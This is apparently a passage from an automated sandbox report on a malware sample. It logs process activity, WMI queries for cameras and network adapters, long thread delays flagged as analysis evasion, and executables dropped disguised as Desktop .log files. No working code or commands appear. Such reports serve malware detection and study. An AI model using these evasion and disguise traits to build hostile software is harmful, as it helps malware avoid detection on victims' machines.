                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  barindex
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeMemory allocated: 2720000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeMemory allocated: 1A8C0000 memory reserve | memory write watch
                                  Source: C:\Recovery\HpQPPZazcv.exeMemory allocated: 1320000 memory reserve | memory write watch
                                  Source: C:\Recovery\HpQPPZazcv.exeMemory allocated: 1AE00000 memory reserve | memory write watch
                                  Source: C:\Recovery\HpQPPZazcv.exeMemory allocated: 890000 memory reserve | memory write watch
                                  Source: C:\Recovery\HpQPPZazcv.exeMemory allocated: 1A6A0000 memory reserve | memory write watch
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 600000
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 599745
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 3600000
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 583656
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 580984
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 579906
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 579422
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 577140
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 576531
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 574172
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 573562
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 572890
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 572375
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 572000
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 571703
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 571375
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 571140
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 570906
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 570751
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 570627
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 568775
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 568562
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 568446
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 568203
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 568020
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 567828
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 567651
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 567527
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 567390
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 565203
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 565053
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 564656
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 564493
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 564381
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 564115
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 563984
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 563875
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 563764
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 563656
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 563542
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 562034
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 561919
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 561812
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 561702
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 561586
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 561467
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 561351
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 560689
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 560578
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 560439
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 560319
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 560199
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 560053
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 558589
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 558481
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 558375
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 558265
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 558155
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 558043
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 557929
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 557811
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 557702
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 557585
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 557479
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 557358
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 557250
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 557139
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 557031
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 556922
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 556812
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2694
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3130
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2399
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2348
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 821
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6424
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 491
                                  Source: C:\Recovery\HpQPPZazcv.exeWindow / User API: threadDelayed 4440
                                  Source: C:\Recovery\HpQPPZazcv.exeWindow / User API: threadDelayed 5107
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\sNdMsyHA.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\_sqlite3.pydJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\_bz2.pydJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\jLnWNQxJ.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_lzma.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\etRnODSa.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\itfeGmlQ.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\nQMnEjGz.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\wPQtSLGm.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\_queue.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\rar.exeJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\_decimal.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\sTOcLgQt.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\VmdPWrri.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\python310.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\flhVkUrV.logJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.dllJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\JmBJbHgR.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\JryrolxS.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\qBrDLwRs.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\RXtRpjXE.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_bz2.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_hashlib.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\jHNEqIuO.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\oXnVlCHH.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\tcMmcUQx.logJump to dropped file
